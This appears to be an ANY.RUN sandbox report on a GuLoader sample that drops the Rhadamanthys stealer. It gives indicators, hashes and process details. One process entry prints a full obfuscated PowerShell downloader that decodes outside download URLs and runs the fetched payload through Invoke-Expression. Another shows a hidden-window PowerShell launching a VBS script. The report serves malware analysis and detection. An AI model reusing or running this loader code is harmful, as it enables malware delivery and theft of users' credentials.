File name:

powershell.exe

Full analysis: https://app.any.run/tasks/8f111392-565f-41eb-a627-f7250ef65d4b
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Analysis date: July 02, 2024, 07:31:28
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
loader
rhadamanthys
stealer
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (console) x86-64, for MS Windows
MD5: 2E5A8590CF6848968FC23DE3FA1E25F1
SHA1: 801262E122DB6A2E758962896F260B55BBD0136A
SHA256: 9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3
SSDEEP: 12288:oufZaQ9EEEEEEEE4OvnEEEEEEEE4NDzw9jXhVXVVVV3+VVVVCNGxDx:outEEEEEEEE4MnEEEEEEEE4NDyjXbCx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 3324)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 880)
    • GULOADER has been detected

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)
    • RHADAMANTHYS has been detected (SURICATA)

      • OOBE-Maintenance.exe (PID: 6352)
      • OpenWith.exe (PID: 7080)
      • dllhost.exe (PID: 4072)
    • Actions look like stealing of personal data

      • OOBE-Maintenance.exe (PID: 6352)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • powershell.exe (PID: 3324)
    • Reads the date of Windows installation

      • powershell.exe (PID: 3324)
    • Application launched itself

      • powershell.exe (PID: 4072)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 4072)
    • The process executes VB scripts

      • powershell.exe (PID: 4072)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 936)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 3324)
      • wab.exe (PID: 6980)
    • Starts POWERSHELL.EXE for command execution

      • powershell.exe (PID: 4072)
      • wscript.exe (PID: 936)
      • powershell.exe (PID: 240)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 936)
      • powershell.exe (PID: 240)
    • Starts CMD.EXE for command execution

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)
    • Likely accesses (executes) a file from the Public directory

      • wscript.exe (PID: 936)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 6388)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 6980)
      • powershell.exe (PID: 3324)
    • The process checks if it is being run in the virtual environment

      • OpenWith.exe (PID: 7080)
    • Executes application which crashes

      • wab.exe (PID: 6980)
    • Loads DLL from Mozilla Firefox

      • OOBE-Maintenance.exe (PID: 6352)
    • Searches for installed software

      • OOBE-Maintenance.exe (PID: 6352)
    • Contacting a server suspected of hosting a CnC

      • OpenWith.exe (PID: 7080)
      • OOBE-Maintenance.exe (PID: 6352)
      • dllhost.exe (PID: 4072)
    • Process checks Powershell history file

      • powershell.exe (PID: 3324)
    • Connects to unusual port

      • dllhost.exe (PID: 4072)
  • INFO

    • Process checks computer location settings

      • powershell.exe (PID: 3324)
    • Checks supported languages

      • powershell.exe (PID: 3324)
      • acrobat_sl.exe (PID: 6324)
      • wab.exe (PID: 6980)
      • wmlaunch.exe (PID: 4164)
      • TextInputHost.exe (PID: 2888)
    • Reads the computer name

      • powershell.exe (PID: 3324)
      • wab.exe (PID: 6980)
      • TextInputHost.exe (PID: 2888)
    • Reads the software policy settings

      • powershell.exe (PID: 3324)
      • wab.exe (PID: 6980)
    • Creates files in a temporary directory

      • powershell.exe (PID: 3324)
    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 3324)
    • Checks proxy server information

      • powershell.exe (PID: 4072)
      • powershell.exe (PID: 240)
      • wab.exe (PID: 6980)
    • Disables trace logs

      • powershell.exe (PID: 4072)
      • powershell.exe (PID: 240)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4072)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 880)
      • powershell.exe (PID: 6388)
    • Application launched itself

      • Acrobat.exe (PID: 3828)
      • AcroCEF.exe (PID: 3888)
      • firefox.exe (PID: 3068)
      • firefox.exe (PID: 4700)
      • firefox.exe (PID: 7096)
      • firefox.exe (PID: 3052)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 936)
      • powershell.exe (PID: 240)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)
    • Executable content was dropped or overwritten

      • AdobeARM.exe (PID: 6260)
    • Creates files or folders in the user directory

      • wab.exe (PID: 6980)
    • Reads the machine GUID from the registry

      • wab.exe (PID: 6980)
      • wmlaunch.exe (PID: 4164)
      • powershell.exe (PID: 3324)
    • Manual execution by a user

      • OOBE-Maintenance.exe (PID: 6352)
      • powershell.exe (PID: 4072)
      • OpenWith.exe (PID: 7080)
      • firefox.exe (PID: 3068)
      • firefox.exe (PID: 3052)
    • Process checks Powershell version

      • powershell.exe (PID: 3324)
    • Reads Environment values

      • powershell.exe (PID: 3324)
    • Reads Microsoft Office registry keys

      • firefox.exe (PID: 4700)
      • firefox.exe (PID: 7096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2096:03:14 04:00:21+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.2
CodeSize: 38400
InitializedDataSize: 418304
UninitializedDataSize: -
EntryPoint: 0x42a0
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 10
Subsystem: Windows command line
FileVersionNumber: 10.0.19041.3996
ProductVersionNumber: 10.0.19041.3996
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Windows PowerShell
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
InternalName: POWERSHELL
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: PowerShell.EXE
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.19041.3996
No data.
All screenshots are available in the full report
Total processes
210
Monitored processes
57
Malicious processes
8
Suspicious processes
0

Behavior graph

start powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs acrobat.exe no specs acrobat.exe no specs wscript.exe no specs #GULOADER powershell.exe conhost.exe no specs cmd.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs adobearm.exe acrobat_sl.exe no specs #GULOADER powershell.exe no specs cmd.exe no specs acrocef.exe no specs wab.exe #RHADAMANTHYS openwith.exe werfault.exe no specs #RHADAMANTHYS oobe-maintenance.exe conhost.exe no specs wmlaunch.exe no specs #RHADAMANTHYS dllhost.exe firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs textinputhost.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. 
Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. 
SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. 
CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. 
') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. 
');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 244
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5140 -parentBuildID 20240213221259 -sandboxingKind 0 -prefsHandle 5112 -prefMapHandle 5048 -prefsLen 36339 -prefMapSize 244343 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26955065-ae48-4704-a074-9de40db2fcfe} 4700 "\\.\pipe\gecko-crash-server-pipe.4700" 1e4c10b2b10 utility
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
1
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
PID: 640
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2256 -parentBuildID 20240213221259 -prefsHandle 2244 -prefMapHandle 2240 -prefsLen 30745 -prefMapSize 244343 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52f61c39-0d3f-4ace-92b5-cf80fa06a6c4} 7096 "\\.\pipe\gecko-crash-server-pipe.7096" 2b8e7580310 socket
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
PID: 880
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 880
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 2888 -prefsLen 30953 -prefMapSize 244343 -jsInitHandle 1492 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed77543a-46ff-482c-b528-c7fec1cc87a8} 4700 "\\.\pipe\gecko-crash-server-pipe.4700" 1e4be751690 tab
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
PID: 936
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\p2q.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1088
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2752 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1140
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1452
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2448 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1512
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1716 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
